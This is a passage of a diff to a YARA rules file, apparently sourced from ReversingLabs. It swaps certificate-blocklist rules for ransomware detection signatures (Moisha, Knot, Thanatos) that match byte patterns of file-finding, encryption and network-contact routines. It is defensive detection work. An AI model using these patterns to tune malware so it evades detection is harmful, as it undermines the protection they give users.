+            ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19
+            03 A2 25 1A 72 ?? ?? ?? ?? A2 25 1B 04 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 0A 73 ?? ?? ??
+            ?? 25 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F
+            ?? ?? ?? ?? 26 DE ?? 26 DE ?? 2A
+        }
+		$send_dns_request = {
+            1C 8D ?? ?? ?? ?? 25 16 04 28 ?? ?? ?? ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 03 A2 25 19
+            72 ?? ?? ?? ?? A2 25 1A 02 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
+            26 DE ?? 26 DE ?? 2A
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $send_http_request ) and ( $send_dns_request )
+}
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Moisha : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Moisha ransomware."
 		author = "ReversingLabs"
-		id = "489ffe25-43cf-55b6-b249-17d251b9774e"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "c72f654f-955e-5ff6-ac91-19fbb858265c"
+		date = "2022-10-11"
+		modified = "2022-10-11"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2266-L2282"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "9bc044b4fdf381274a2c31bc997dcdfd553595d92de7b33dc472353a00011711"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Moisha.yara#L1-L86"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "89cefbbb8ec722216721bb43eb14cc33fcd4671585051359a06b62236cbf3a6c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Moisha"
+		tc_detection_factor = 5
+		importance = 25
+
+	strings:
+		$find_files_p1 = {
+            73 ?? ?? ?? ?? 0A 02 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 28
+            ?? ?? ?? ?? 2D ?? 06 08 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ??
+            ?? ?? ?? DC DE ?? 26 DE ?? 06 2A
+        }
+		$find_files_p2 = {
+            02 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
+            0B 2B ?? 07 6F ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 0D 03 09 6F ?? ?? ?? ?? 04 2C ?? 04 09
+            6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 06 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 03 04
+            28 ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 03 11 ?? 6F ?? ?? ?? ?? 04 2C ?? 04
+            11 ?? 6F ?? ?? ?? ?? 2A
+        }
+		$find_files_p3 = {
+            73 ?? ?? ?? ?? 0A 06 03 7D ?? ?? ?? ?? 06 04 7D ?? ?? ?? ?? 06 05 7D ?? ?? ?? ?? 02 28
+            ?? ?? ?? ?? 39 ?? ?? ?? ?? 06 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 7B ??
+            ?? ?? ?? 2C ?? 06 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 31 ?? 06 7B ?? ?? ?? ?? 2C ?? 06 FE
+            06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 17 6F ?? ?? ?? ?? 07 17 6F ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 02 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 09 6F ?? ?? ?? ?? 06 7B
+            ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 26 DE ?? 12 ?? 28
+            ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? DC 2A
+        }
+		$import_priv_key = {
+            02 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 16 13 ?? 16 13 ?? 16 13 ?? 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 11 ?? 20 ??
+            ?? ?? ?? 33 ?? 11 ?? 6F ?? ?? ?? ?? 26 2B ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? 2E ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 6F
+            ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 11 ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0A 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
+            0B 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 0C 11 ?? 28 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 6F ?? ?? ?? ?? 0D 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13
+            ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13
+            ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ??
+            ?? 13 ?? 12 ?? FE 15 ?? ?? ?? ?? 12 ?? 06 7D ?? ?? ?? ?? 12 ?? 07 7D ?? ?? ?? ?? 12 ??
+            08 7D ?? ?? ?? ?? 12 ?? 09 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ??
+            ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 7D ?? ?? ?? ?? 11 ?? 13 ?? DE ?? 11 ??
+            6F ?? ?? ?? ?? DC 11 ?? 2A
+        }
+		$encrypt_files = {
+            20 ?? ?? ?? ?? 8D ?? ?? ?? ?? 0A 14 0B 14 0C 16 0D 20 ?? ?? ?? ?? 13 ?? 03 19 17 1D 28
+            ?? ?? ?? ?? 0B 03 19 18 1D 28 ?? ?? ?? ?? 0C 02 7B ?? ?? ?? ?? 08 17 6F ?? ?? ?? ?? 13
+            ?? 07 06 16 06 8E 69 6F ?? ?? ?? ?? 13 ?? 11 ?? 16 31 ?? 11 ?? 06 16 11 ?? 6F ?? ?? ??
+            ?? 11 ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 04 11 ?? 6F ?? ?? ?? ?? 04 6F ?? ?? ?? ??
+            13 ?? 11 ?? 8E 69 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 08 08 6F ?? ?? ?? ?? 16 6F ?? ?? ??
+            ?? 26 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08 11 ?? 16 11 ?? 8E 69 6F ?? ?? ?? ?? 08
+            6F ?? ?? ?? ?? 17 0D DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 13 ?? DE ?? 07 2C
+            ?? 07 6F ?? ?? ?? ?? 08 2C ?? 08 6F ?? ?? ?? ?? 09 26 DC 2A
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $import_priv_key ) and ( $encrypt_files )
+}
+rule REVERSINGLABS_Win32_Ransomware_Knot : TC_DETECTION MALICIOUS MALWARE FILE
+{
+	meta:
+		description = "Yara rule that detects Knot ransomware."
+		author = "ReversingLabs"
+		id = "4dfe9da5-7ab1-57dc-95fc-b05777f235b8"
+		date = "2021-03-19"
+		modified = "2021-03-19"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Knot.yara#L1-L118"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a7a3e13139d68314e583ec225a5d56373a551e67d46984dcf9a228a1f7275f14"
+		score = 75
+		quality = 90
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Knot"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            6A ?? 6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 32 C0 E9 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75
+            ?? 32 C0 E9 ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B
+            55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 32 C0 E9 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 FF 15
+        }
+		$encrypt_files_p2 = {
+            85 C0 75 ?? 32 C0 E9 ?? ?? ?? ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A
+            ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 8B
+            95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 8B 55 ?? 52 6A
+            ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74
+            ?? 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 4D
+            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 8B 8D ?? ?? ??
+            ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15
+            ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? B0 ?? 8B E5 5D C3
+        }
+		$find_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? C6 85
+            ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 0F B7 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ??
+            ?? ?? 8B 95 ?? ?? ?? ?? 83 E2 ?? 89 95 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 83 F8 ?? 75 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
+            ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C7 85 ?? ?? ?? ??
+            ?? ?? ?? ?? EB ?? 8B 8D ?? ?? ?? ?? 83 C1 ?? 89 8D ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ??
+            73 ?? 8B 95 ?? ?? ?? ?? 8B 04 95 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ??
+            83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 95 ?? ?? ?? ?? 83 FA ?? 75
+        }
+		$find_files_p2 = {
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 83 C0 ?? 89 85 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 73 ?? 8B 8D ?? ?? ?? ?? 8B 14 8D ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? EB ?? 0F B6 8D ?? ?? ??
+            ?? 83 F9 ?? 0F 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
+            ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ??
+            ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 95 ??
+            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
+            8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ??
+            51 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ??
+            8B E5 5D C3
+        }
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A
+            ?? FF 15 ?? ?? ?? ?? 89 45 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 75 ?? 6A ?? FF 15 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 83 F8 ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C8 83 F9 ?? 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ?? ?? ?? F7 F9 81 C2 ?? ?? ?? ?? 52 8D 95 ?? ?? ?? ??
+            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 33 C0 E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 6A ??
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? EB ?? 8B 95 ?? ??
+            ?? ?? 83 C2 ?? 89 95 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 7F ?? 8D 85 ?? ?? ?? ?? 50 8B
+            8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BD ?? ?? ?? ?? ?? 74
+            ?? EB ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? EB ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 33 C0 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Raffaele Carnacina" and pe.signatures [ i ] . serial == "08:44:8b:d6:ee:91:05:ae:31:22:8e:a5:fe:49:6f:63" and 1445212799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_02F17566Ef568Dc06C9A379Ea2F4Faea : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects Thanatos ransomware."
 		author = "ReversingLabs"
-		id = "a14e16ff-844c-53ff-9297-8760265da747"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "190adbd0-30a7-5619-ab70-3ab031ece2f7"
+		date = "2020-11-13"
+		modified = "2020-11-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2284-L2300"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e3ec8a6de817354862880301e78a999f45f02c2fa8512bba6d27c9776f1a3417"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Thanatos"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VALERIANO BEDESCHI" and pe.signatures [ i ] . serial == "02:f1:75:66:ef:56:8d:c0:6c:9a:37:9e:a2:f4:fa:ea" and 1441324799 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_7D824Ba1F7F730319C50D64C9A7Ed507 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4372aea7-a25b-5211-befd-9e0bcfb09199"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2302-L2318"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "407611603974c910d9a6a0ed71ecdf54ddcc59abb0f48c60846e61d6d4191933"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 50 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 89 85 ?? ?? ?? ?? EB ?? 8D 49 ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 83 C4 ?? C6 03 ?? FF
+            15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 99 B9 ?? ??
+            ?? ?? F7 F9 52 53 68 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 4F 75 ?? 8B 95 ?? ?? ??
+            ?? 52 8D 85 ?? ?? ?? ?? 50 C6 43 ?? ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? 51 FF D6 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 FF D6 F6 85 ?? ?? ?? ?? ??
+            74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF D7 85 C0 0F 84 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2
+            50 8D 8D ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8D BD
+            ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8B F8 72 ?? 8B
+            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 74 ?? 53 8D 9D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ??
+            ?? 8B E5 5D C3
+        }
+		$encrypt_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 33 DB 6A ?? 53 8B F0 53 8D 45 ?? 33 FF 50
+            89 7D ?? 89 5D ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55
+            ?? 8D 4D ?? 51 53 53 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B
+            C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 53 2B C2 50 8B 45 ?? 56 50 FF 15 ?? ?? ?? ?? 85 C0
+            0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8D 4D ?? 51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ??
